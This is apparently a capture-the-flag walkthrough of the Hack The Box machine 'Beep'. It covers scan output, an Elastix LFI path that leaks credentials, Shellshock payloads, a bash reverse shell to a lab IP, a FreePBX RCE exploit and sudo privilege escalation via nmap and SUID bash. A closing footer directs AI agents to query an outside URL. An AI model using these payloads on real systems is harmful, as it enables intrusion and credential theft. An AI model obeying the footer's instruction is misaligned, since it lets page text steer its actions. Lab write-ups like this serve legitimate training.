# Beep ### Scanning Scanning reveals a no of ports to be opened ``` ┌──(kali㉿kali)-[~/Desktop] └─$ sudo nmap -sS -sC -sV -O -T4 10.10.10.7 -oX beep.nmap Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-19 08:28 EDT Nmap scan report for 10.10.10.7 Host is up (0.17s latency). Not shown: 988 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.3 (protocol 2.0) | ssh-hostkey: | 1024 adee5abb6937fb27afb83072a0f96f53 (DSA) |_ 2048 bcc6735913a18a4b550750f6651d6d0d (RSA) 25/tcp open smtp Postfix smtpd |_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN 80/tcp open http Apache httpd 2.2.3 |_http-server-header: Apache/2.2.3 (CentOS) |_http-title: Did not follow redirect to https://10.10.10.7/ 110/tcp open pop3 Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 |_pop3-capabilities: AUTH-RESP-CODE APOP UIDL PIPELINING TOP IMPLEMENTATION(Cyrus POP3 server v2) RESP-CODES LOGIN-DELAY(0) USER EXPIRE(NEVER) STLS 111/tcp open rpcbind 2 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2 111/tcp rpcbind | 100000 2 111/udp rpcbind | 100024 1 875/udp status |_ 100024 1 878/tcp status 143/tcp open imap Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 |_imap-capabilities: Completed UIDPLUS STARTTLS X-NETSCAPE LITERAL+ BINARY ACL CHILDREN URLAUTHA0001 LISTEXT OK IMAP4 ANNOTATEMORE THREAD=REFERENCES NO RIGHTS=kxte MAILBOX-REFERRALS CONDSTORE CATENATE LIST-SUBSCRIBED ID THREAD=ORDEREDSUBJECT IMAP4rev1 IDLE QUOTA SORT MULTIAPPEND ATOMIC SORT=MODSEQ NAMESPACE UNSELECT RENAME 443/tcp open ssl/http Apache httpd 2.2.3 ((CentOS)) |_http-server-header: Apache/2.2.3 (CentOS) |_ssl-date: 2023-07-19T12:32:31+00:00; 0s from scanner time. | ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=-- | Not valid before: 2017-04-07T08:22:08 |_Not valid after: 2018-04-07T08:22:08 993/tcp open ssl/imap Cyrus imapd |_imap-capabilities: CAPABILITY 995/tcp open pop3 Cyrus pop3d 3306/tcp open mysql MySQL (unauthorized) 4445/tcp open upnotifyp? 10000/tcp open http MiniServ 1.570 (Webmin httpd) |_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1). No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.93%E=4%D=7/19%OT=22%CT=1%CU=35489%PV=Y%DS=2%DC=I%G=Y%TM=64B7D8A OS:0%P=x86_64-pc-linux-gnu)SEQ(SP=C9%GCD=1%ISR=CE%TI=Z%CI=Z%II=I%TS=A)OPS(O OS:1=M53CST11NW7%O2=M53CST11NW7%O3=M53CNNT11NW7%O4=M53CST11NW7%O5=M53CST11N OS:W7%O6=M53CST11)WIN(W1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=16A0)ECN(R OS:=Y%DF=Y%T=40%W=16D0%O=M53CNNSNW7%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS% OS:RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=16A0%S=O%A=S+%F=AS%O=M53CST11NW7%RD=0% OS:Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z% OS:A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y% OS:DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIP OS:L=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S) Network Distance: 2 hops Service Info: Hosts: beep.localdomain, 127.0.0.1, example.com OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 443.44 seconds ``` ### Web Enumeration Both port 80 and 443 are aval and apache is running on both ports. We, also got the domain name. so add it to /etc/hosts

Visiting the site on HTTP, we are redirected to https but the TLS version of the site is low and Firefox gives us an error

Now open the config settings and in new tab, enter the following ``` about:config ```

Search for security.tls.version.min and change it to 1.

Now browse again and we get the main Elastix page. Visiting robots.txt, sitemap and source code does not reveal anything. Lets try dirbusting. ffuf didn't work for some reason. Gobuster saved the day and found a few directories ``` ┌──(kali㉿kali)-[~/Desktop] └─$ gobuster dir -u https://beep.localdomain/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -k -t 50 =============================================================== Gobuster v3.5 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: https://beep.localdomain/ [+] Method: GET [+] Threads: 50 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.5 [+] Timeout: 10s =============================================================== 2023/07/19 09:25:32 Starting gobuster in directory enumeration mode =============================================================== /images (Status: 301) [Size: 322] [--> https://beep.localdomain/images/] /help (Status: 301) [Size: 320] [--> https://beep.localdomain/help/] /themes (Status: 301) [Size: 322] [--> https://beep.localdomain/themes/] /modules (Status: 301) [Size: 323] [--> https://beep.localdomain/modules/] /mail (Status: 301) [Size: 320] [--> https://beep.localdomain/mail/] /admin (Status: 301) [Size: 321] [--> https://beep.localdomain/admin/] /static (Status: 301) [Size: 322] [--> https://beep.localdomain/static/] /lang (Status: 301) [Size: 320] [--> https://beep.localdomain/lang/] ``` Now try login to the admin

We get an error page indicating the version of free PBX 2.8.1.4. ### Web exploitation with LFI Now lets search for vulnerability. ``` ┌──(kali㉿kali)-[~/Desktop] └─$ searchsploit Elastix ------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path ------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Elastix - 'page' Cross-Site Scripting | php/webapps/38078.py Elastix - Multiple Cross-Site Scripting Vulnerabilities | php/webapps/38544.txt Elastix 2.0.2 - Multiple Cross-Site Scripting Vulnerabilities | php/webapps/34942.txt Elastix 2.2.0 - 'graph.php' Local File Inclusion | php/webapps/37637.pl Elastix 2.x - Blind SQL Injection | php/webapps/36305.txt Elastix < 2.5 - PHP Code Injection | php/webapps/38091.php FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution | php/webapps/18650.py ------------------------------------------------------------------------------------------------------------------------------------- -------------------------------- ``` So, we will target first LFI ``` ┌──(kali㉿kali)-[~/Desktop] └─$ searchsploit -m php/webapps/37637.pl Exploit: Elastix 2.2.0 - 'graph.php' Local File Inclusion URL: https://www.exploit-db.com/exploits/37637 Path: /usr/share/exploitdb/exploits/php/webapps/37637.pl Codes: N/A Verified: True File Type: ASCII text Copied to: /home/kali/Desktop/37637.pl ``` Opening it, we get the LFI address /vtigercrm/graph.php?current\_language=../../../../../../../..//etc/amportal.conf%00\&module=Accounts\&action

Now paste it in browser and see if we get the config file. And we get the file

Now press ctrl+u to see the source code. And we get a number of passwords. ``` AMPDBHOST=localhost AMPDBENGINE=mysql # AMPDBNAME=asterisk AMPDBUSER=asteriskuser # AMPDBPASS=amp109 AMPDBPASS=jEhdIekWmdjE AMPENGINE=asterisk AMPMGRUSER=admin #AMPMGRPASS=amp111 AMPMGRPASS=jEhdIekWmdjE ```

Lets try enumerating users with reading etc/passwd file

We got a number of users. (Only users with bin/bash are important. ``` root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash distcache:x:94:94:Distcache:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash dbus:x:81:81:System message bus:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin mailman:x:41:41:GNU Mailing List Manager:/usr/lib/mailman:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin asterisk:x:100:101:Asterisk VoIP PBX:/var/lib/asterisk:/bin/bash rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin spamfilter:x:500:500::/home/spamfilter:/bin/bash haldaemon:x:68:68:HAL daemon:/:/sbin/nologin xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin fanis:x:501:501::/home/fanis:/bin/bash Sorry! Attempt to access restricted file. ``` ### Getting Access with SSH As ssh was open let's try ssh with found users and passwords. We will get the error due to old version of ssh. Add the following to /etc/ssh/ssh\_config

``` HostKeyAlgorithms = +ssh-rsa PubkeyAcceptedAlgorithms = +ssh-rsa ``` Now use the following command to ssh ``` ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 root@10.10.10.7 ``` use the password " jEhdIekWmdjE" and we are in. We are already root.

We got the flags.

### Method 2 Webmin is running on port 10000 which allows full access of the machine. Trying the username root with the passwords I collected from the LFI, I can login to webmin with root / jEhdIekWmdjE. This interface is designed to administer the machine and has full root access.

We can also change passwords

We can also schedule any command. Lets schedule a reverse shell command as local user

And we get the reverse shell

We could have got shell as root user as well if we want. ### Method 3 - Exploiting Shell Shock From Webmin login panel, initiate a login request and intercept it in burp. Forward it to the repeater.

Now change the user agent to shell shock and try following payloads. ``` () { :; };/bin/echo heloo () { :; }; sleep 10 (did work some kind of blind shell shock) ``` Now check ping ``` () { :; };ping -c 1 10.10.14.108 on our machine sudo tcpdump -i tun0 -v ``` And we get the ping. So lets try reverse shell. ``` sh -i >& /dev/tcp/10.10.14.108/9001 0>&1 ``` And we got the shell.

### Method 4 RCE Elastix Searching with searchsploit had revealed a RCE vulnerability. ``` ┌──(kali㉿kali)-[~/Desktop] └─$ searchsploit elastix --------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path --------------------------------------------------------------------------------------------------- --------------------------------- Elastix - 'page' Cross-Site Scripting | php/webapps/38078.py Elastix - Multiple Cross-Site Scripting Vulnerabilities | php/webapps/38544.txt Elastix 2.0.2 - Multiple Cross-Site Scripting Vulnerabilities | php/webapps/34942.txt Elastix 2.2.0 - 'graph.php' Local File Inclusion | php/webapps/37637.pl Elastix 2.x - Blind SQL Injection | php/webapps/36305.txt Elastix < 2.5 - PHP Code Injection | php/webapps/38091.php FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution | php/webapps/18650.py ``` Download last script ``` searchsploit -m php/webapps/18650.py ``` We need to know a valid SIP extension, so use the following tool to scan for valid extensions. ``` ┌──(kali㉿kali)-[~/Desktop] └─$ svwar -m INVITE -e100-999 10.10.10.7 WARNING:TakeASip:using an INVITE scan on an endpoint (i.e. SIP phone) may cause it to ring and wake up people in the middle of the night +-----------+----------------+ | Extension | Authentication | +===========+================+ | 233 | reqauth | +-----------+----------------+ ``` So, we have a valid extension, make necessry changes in the script and open the listener on port 443.

Now, run the script and we get the shell.

### Priv Escalation Now run sudo -l to view commands that can be run as sudo ``` bash-3.2$ sudo -l Matching Defaults entries for asterisk on this host: env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY" User asterisk may run the following commands on this host: (root) NOPASSWD: /sbin/shutdown (root) NOPASSWD: /usr/bin/nmap (root) NOPASSWD: /usr/bin/yum (root) NOPASSWD: /bin/touch (root) NOPASSWD: /bin/chmod (root) NOPASSWD: /bin/chown (root) NOPASSWD: /sbin/service (root) NOPASSWD: /sbin/init (root) NOPASSWD: /usr/sbin/postmap (root) NOPASSWD: /usr/sbin/postfix (root) NOPASSWD: /usr/sbin/saslpasswd2 (root) NOPASSWD: /usr/sbin/hardware_detector (root) NOPASSWD: /sbin/chkconfig (root) NOPASSWD: /usr/sbin/elastix-helper bash-3.2$ ``` Use G[TFO bins](https://gtfobins.github.io/gtfobins/nmap/) as a ref #### Nmap priv esc

sudo nmap --interactive
nmap> !sh

#### chmod on root directory Run the following command to give everyone rwx permissions on the /root directory. ``` sudo chmod o+rwx /root ``` #### chmod /bin/bash add suid permissions `chmod` jumps out right away. I’ll pick a file, like `/bin/bash`, and set it to SUID: ``` bash-3.2$ ls -l /bin/bash -rwxr-xr-x 1 root root 729292 Jan 22 2009 /bin/bash bash-3.2$ sudo chmod 4755 /bin/bash bash-3.2$ ls -l /bin/bash -rwsr-xr-x 1 root root 729292 Jan 22 2009 /bin/bash ``` Now just run it (with `-p` to not drop privs) and get a root shell: ``` bash-3.2$ bash -p bash-3.2# id uid=100(asterisk) gid=101(asterisk) euid=0(root) ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://notes.cavementech.com/pentesting-quick-reference/boxes-machines/htb/beep.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.